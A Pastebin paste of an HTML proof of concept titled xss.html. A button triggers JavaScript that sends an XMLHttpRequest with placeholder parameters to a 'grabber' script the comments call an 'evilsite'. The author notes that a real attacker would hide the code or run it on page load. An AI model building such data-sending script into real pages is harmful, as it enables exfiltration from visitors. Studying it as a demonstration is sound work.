Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- blog$ cat xss.html
- <!DOCTYPE html>
- <html>
- <head>
- <script type="text/javascript">
- function oneSecAttack() {
- var xmlhttp;
- var base = 'http://localhost/kuba/sample/REgrabber.php?'; // base url - url to evilsite
- var a = 'a=aa'; // parameters
- var b ='&b=bb'; // ...
- var c ='&c=cc'; // ...
- if (window.XMLHttpRequest) {// for IE7+/FF/Chrome
- xmlhttp=new XMLHttpRequest();
- }
- else {// for ie5/6
- xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
- }
- xmlhttp.onreadystatechange=function() // run forest run
- {
- if (xmlhttp.readyState==4 && xmlhttp.status==200)
- {
- document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
- }
- }
- var url2 = base + a + b + c;
- xmlhttp.open("GET",url2 ,true);
- xmlhttp.send();
- document.write(url2 + " - <br><br>this HTTP GET content goes to evil site as a parameters<br>");
- document.write("it could be usefull in future (lfi/rfi for example)<br>");
- // fin
- }
- </script>
- </head>
- <body>
- <h2>Try to hide me</h2>
- <button type="button" onclick="oneSecAttack()">Hide now!</button>
- <b><br><br><br>Here we are loading request from onClick(). I think in 'real-life'<br>
- scenario, attacker will hide his code and/or add it as a 'onLoad' or similar idea.</b>
- <div id="myDiv"></div>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement